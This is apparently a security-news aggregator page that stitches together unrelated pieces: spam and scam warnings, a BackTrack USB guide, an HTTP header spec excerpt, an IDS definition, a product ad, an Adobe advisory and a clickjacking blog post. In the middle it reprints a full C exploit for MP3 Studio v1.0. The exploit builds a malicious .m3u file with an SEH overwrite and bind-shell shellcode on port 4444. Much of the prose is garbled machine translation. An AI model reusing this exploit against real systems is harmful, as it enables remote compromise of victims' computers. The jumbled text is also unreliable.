Hacker Source

Fake antivirus is still the target to the user facebook. To be directed to a specific site and download a fake antivirus.

The subject is made interesting emails like “IMF boss Dominique Strauss-Kahn Exclusive Rape Videos – Black lady under attack!”dab “oh shit, one more really Freaky video O_O”. And much more fake links that trap.
Some links will link to another site that is Newtubes.in. Last name not be placed at sites in India, but the server is located in the state of Lithuania.

If you want to view streaming video content with the name of the Youtube site. We recommend that you check the link given before becoming a victim of fraudsters on the internet.

When this target is not the dominance of anti-counterfeit computer users of Windows OS, but Apple’s Mac becomes a target.

Researcher’s security said in the 16 hours of the attack. Up notable to block dangerous links and keep spreading. Though the name of the topic or subject of the link has not changed, and continues to appear on Facebook pages.

Better be careful, before you bothered because one click and fake antivirus warning appears on the screen of your computer.
[ Thatcoin.com ]

Microsoft reported attacks in Windows 7 from Malware attacksrose 30% in 2010.Sedangkan Windows XP down 20%.
Computer with Windows 7 32bit, on average there are 4 of 1000computers infected with malware. While the lower 64 bit OS to 2.5per 1000 computers in 2010. From 3 OS which is owned byMicrosoft, only Windows XP has decreased attacks.

The new report obtained from the use of software Malicious Software Removal Tool (MSRT), which provided free by Microsoftto check to see computers against viruses, fake antivirus, trojans and other malware.

[ Thatcoin.com ]

BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures.
We will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE). Tool integration from our repositories

will be seamless with all our supported DE’s, including the specific DE menu structure
[ Thatcoin.com ]

The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection software from Kaspersky. The produst will scan the specified locations for any virus threats and remove them or send to Quarantine folder.

Kaspersky Virus Removal Tool 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.

Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.


Advantages:

Simplified interface.
Can be installed to an infected computer (Safe Mode supported).
Composite scan and disinfection system: signature detection and heuristic analyzer.
Gathering system information and interactive creation of scripts for disinfection.

General functions:

Automatic and manual removal of virus, Trojans and worms.
Automatic and manual removal of Spyware and Adware modules.
Automatic and manual removal of all types of rootkits.
Kaspersky Virus Removal Tool 2010 is Freeware.


[Thatcoin.com]
Download support.kaspersky.com/viruses/avptool2010?level=2

Again DHL International Courier company name used by spammers from Poland
Bringing a Message
Subject of email
Dear customer. DHL notification

The parcel was send your home address.

And it will of arrice Within 7 bussness day.

More information and the tracking number


are attached in the document below.


Thank you.

2011 DHL International GmbH. All rights reserverd.

With files document.zip, in which there is exe file contains a virus Win32/Injector.FBK.Trojan DHL_notification.exe
[Thatcoin.com]

One more attacks on up, give a message “hahahh” , do not be clicked
The link is ordered that smuggle malware links. And display a fake screen of another site with the message “Photo has been Moved.”

When the click on the photos, taken is malware. If the downloaded program is executed, then the browser will at the plow, and can not open facebook and display ads from the manufacturer

Source and read full article

Addition restore deleted files a false moment, FileWing can also delete files permanently. FileWing will find deleted files and displays them. During not overwritten, the file is not a problem to be saved. FileWing can also delete the data completely to overwrite it again.
Tips
FileWing also able to handle an external drive. Thus, this application is suitable for rescue deleted photos on digital cameras.
Source

Facebook users are easy prey for criminals along with the number of people share information. Every day people put themselves at risk by clicking on an imprudent to invitations sent by friends to join the group or write in their walls.
Think about what you add.
Receiving a request provided by a new friend asks posting, photo messaging and information about your personal background. Watch your friends list and think back to who is entitled to access your personal stuff.
Check the privacy settings. Facebook recently did the update, set the privacy from scratch can be very meaningful.

Footwear of being on Facebook. Do share your photos? Stay in touch with other people? Share links and updates the activity? Ask yourself what you want to obtain a personal profile. Thus, cut will be more personal information that is publish
Source and read the complete article

As many 50 passwords and some important documents you can store the data into DataInherit online services. A Free service that combines online stroge and data privacy gives allocation of file storage for 10 mb. Another advantage, through the iPhone, you can also access an account that has been made.
Source

If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To: “Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).
To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.
Well, when you finish Step 5 you will need to follow the instructions below:
Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:
mount /dev/sdc2 /mnt/sdc2
cd /mnt/sdc2
mkdir changes
Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:
cd /boot/syslinux
chmod +Xx lilo
chmod +Xx syslinux
Then you need to open syslinux.cfg and modify it. To do that execute the commands:
cd /mnt/sdc1/boot/syslinux
kwrite syslinux.cfg
I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:
1. “LABEL BT4″
2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.
3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.
4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.
5. Save your changes and exit the editor.
That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.

Source

Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept

The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.

Accept = "Accept" ":"
#( media-range [ accept-params ] )
media-range = ( "*/*"
| ( type "/" "*" )
| ( type "/" subtype )
) *( ";" parameter )
accept-params = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]

The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.

Note: Use of the "q" parameter name to separate media type
parameters from Accept extension parameters is due to historical
practice. Although this prevents any media type parameter named
"q" from being used with a media range, such an event is believed
to be unlikely given the lack of any "q" parameters in the IANA
media type registry and the rare usage of any media type
parameters in Accept. Future media types are discouraged from
registering any parameter named "q".

An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.

IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding.They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.

Source

Haiti recently hit by powerful earthquake. Haiti beaten by 7 earthquake richter scale. The impact of the earthquake is very sad. Victims of the earthquake was not a bit. An estimated 75 thousand people buried in rubble and about 200 thousand people were killed by the earthquake. Assistance from all over the world came. Donations through the virtual world is emerging. It turned out to have been exploited by online criminals.

Online criminals deceive via email and fake websites designed to steal what should be a charitable donation. Symantec has seen online scams spread with themes including Haiti earthquake spam email asking for donations and manipulate search results that can infect computers with malware.

Symantec security experts called on computer users to follow the smart ways to be safe online, and ensure that your donations and assistance to disaster victims and not to con men.

When contributing to a charity online, always remember:

Avoid clicking on suspicious links in emails or IM messages because it may be a link to a fake website. Symantec security experts recommend to type the Web address, such as the Web address charitable organizations, directly into the browser instead of clicking the link in the message.

Do not ever fill out a form in a message requesting personal information, financial or password. A charitable organization has a reputation can not be asked for personal information via e-mail. If you are in doubt, contact the organizations directly concerned by a trusted independent mechanism, such as phone numbers have been verified, or Internet address that you enter into a new browser menu (do not click on or cut and paste the link in the message).

/* mplode.c vs MP3 Studio v1.0
* Tested on: Windows 2000 SP4
*
* Author: Dominic Chell
*
* PoC: http://www.milw0rm.com/exploits/9277
* The PoC author said he could not exploit it so I decided to try.
*
* A bit of fun for a boring night in Peterborough :(
* Good luck finding someone who uses this media player.
*/

#include "stdafx.h"
#include
#include
#include
#include

#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\nExample: mplode.exe [output file]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// bind shell lport = 4444
char shellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";

char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
char outfile[20];
if(argc < 2) { usage(); return 0; } if(strlen(argv[1])<15) { strncpy(outfile, argv[1], 14); outfile[14] = '\0'; } else strcpy(outfile, "mplode.m3u"); FILE *fp = fopen(outfile, "w"); if (!fp) error("[*] Cannot output file\n"); fwrite("http://", 7, 1, fp); for (int i=0; i<4103; i++) { fwrite("\x41", 1, 1, fp); } fwrite(nextseh, 4, 1, fp); fwrite(seh, 4, 1, fp); for (int i=0; i<500; i++) { fwrite("\x90", 1, 1, fp); } fwrite(shellcode, sizeof(shellcode), 1, fp); fclose(fp); fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\n", outfile);
fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);

exit(0);

return 0;
}

source milw0rm.com

Automate Your Penetration Testing

AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.

In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.

Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.

Simple, Fast and Comprehensive

Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.

Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.

Security and Compliance Challenges
Read More

Network security threat is one of the major concerns for all online businesses today. As soon as the computer software was produced the hackers set off on their task of destroying software. In networks the more important thing than software is the data as the data contain sensitive information. Hackers send their programs to either destroy the data bases or steal data. Both are equally dreaded by network administrators.

Network security threat

ShineShadow Security Report 15092009-09

TITLE

Local privilege escalation vulnerability in Protector Plus antivirus software

BACKGROUND

Protector Plus range of antivirus products are known the world over for
their efficiency and reliability. Protector Plus Antivirus Software is
available for Windows Vista, Windows XP, Windows Me, Windows 2000,
Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector
Plus Antivirus Software is the ideal antivirus protection for your
computer against all types of malware like viruses, trojans, worms and
spyware.

Virus writers have created an exploit for an unpatched vulnerability in Adobe Flashplayer, Acrobat and Acrobat reader. The vulnerability exists in these applications on all platforms, Windows, OS X, Linux and Solaris.

The vulnerable products are:

* Adobe Reader 9.1.2 and earlier 9.x versions
* Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions

You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html

The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.

OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. Usual warnings apply, if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.

The malicious PDF contains flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it will exploit the vulnerability via the flash player .dll called authplay.dll. On a Windows system, it is apparently possible to disable the connection between Acrobat and Flash by renaming that .dll and one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternate PDF viewers that would not be vulnerable.

According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.

Adobe is working on a patch and says it will be ready for all platforms, but Solaris, on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.

source oit.ncsu.edu

Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.

After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent before the sensible pages, and today this little mystery has been finally unveiled by Eric Lawrence on the IE Blog:

Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin.

As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.

However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:

I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.

David kindly answered

I think this would be fantastic and it’s a great place to start building some bridges.

I agree, in facts I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).
It’s worth noticing, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really need this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter if web sites cooperate or not.

Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:

Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.

This statement is wrong twice:

1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.
2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.

That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.

source hackademix.net